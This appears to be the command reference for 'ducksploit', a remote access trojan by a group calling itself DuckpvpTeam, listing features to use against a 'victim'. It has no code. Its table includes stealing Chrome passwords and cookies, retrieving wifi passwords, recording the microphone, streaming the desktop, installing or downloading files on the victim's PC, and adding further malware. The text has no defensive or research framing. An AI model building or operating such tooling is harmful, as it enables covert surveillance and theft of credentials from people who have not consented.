      dP                   dP                         dP          oo   dP   
      88                   88                         88               88   
.d888b88 dP    dP .d8888b. 88  .dP  .d8888b. 88d888b. 88 .d8888b. dP d8888P 
88'  `88 88    88 88'  `"" 88888"   Y8ooooo. 88'  `88 88 88'  `88 88   88   
88.  .88 88.  .88 88.  ... 88  `8b.       88 88.  .88 88 88.  .88 88   88   
`88888P8 `88888P' `88888P' dP   `YP `88888P' 88Y888P' dP `88888P' dP   dP   
                                             88                             
                                             dP                             
credits: DuckpvpTeam - 2022

prefix: 'ds'
usage: 'ds <command>'

victim's website: 'http://<victim's ip>:8013'

our team: 'https://canarddu38.github.io/DuckpvpTeam'

commands:

+----------------+----------------------------------+-------------------------------------------+
|    Command     |              Usage               |                  Result                   |
+----------------+----------------------------------+-------------------------------------------+
| help           | help                             | getting the command list                  |   V
| reload         | reload                           | reload connection to the  victim          |   X

##chat__________________________________________________________________________________________
| talk           | talk                             | start talk to your victim                 |   X

##mouse_________________________________________________________________________________________
| mouseclick     | mouseclick [right, middle, left] | click the desired mouse button            |   X
| mousescroll    | mousescroll <int>                | symulate a scrolling with intensity       |   X
| locatemouse    | locatemouse                      | get current victom's mouse locations      |   X


##utilities_____________________________________________________________________________________
>>>>>| uninstall      | uninstall                        | uninstall ducksploit                      |   X    TO DELETE
>>>>>| update         | update                           | update ducksploit                         |   X    TO DELETE
| credits        | credits                          | get ducksploits credits                   |   V

##exploits______________________________________________________________________________________
| open           | open <app name>                  | open desired app                          |   V
| install        | install <path to exe/msi file>   | install package on victim's pc            |   X
| download       | download <url>                   | download file in current url              |   X
| shutdown       | shutdown                         | shutdown the victim's pc                  |   X
| reboot         | reboot                           | reboot the victim's pc                    |   X
| closesession   | closesession                     | close current victim's session            |   X
| host           | host                             | host file at http://{victim's ip}:8013    |   X
| getwifipwd     | getwifipwd                       | get the victim's wifi password            |   X

##troll_________________________________________________________________________________________
| skull          | skull                            | spam cmd with skull and crossbones        |   X
| msg            | msg <title> <line1> <line2>      | create alertbox with desired infos        |   V
| notif          | notif <title> <message> <time>   | send a windows notif for <amount> s       |   V
| rickroll       | rickroll                         | rockroll your victim ;)                   |   X

##stealing______________________________________________________________________________________
| stealpasswords | stealpasswords                   | steal all victim's chrome saved passwords |   X
| stealcookies   | stealcookies                     | steal all victim's chrome cookies         |   X

##spy___________________________________________________________________________________________
| recordmicro    | recordmicro <time in second>     | record victim's micro for 'time'seconds   |   X
| desktopstream  | desktopstream                    | stream in real time victim's desktop      |   X
| screenshot     | screenshot                       | take screenshot                           |   X
|                |                                  | (located in the victim's website)         |
| info           | info                             | get all stored victim's infos             |   V

##evil__________________________________________________________________________________________
| malware        | malware <malware name>           | add malware to vour victim                |   V
|                |                                  | (ds malware --help)                       |
+----------------+----------------------------------+-------------------------------------------+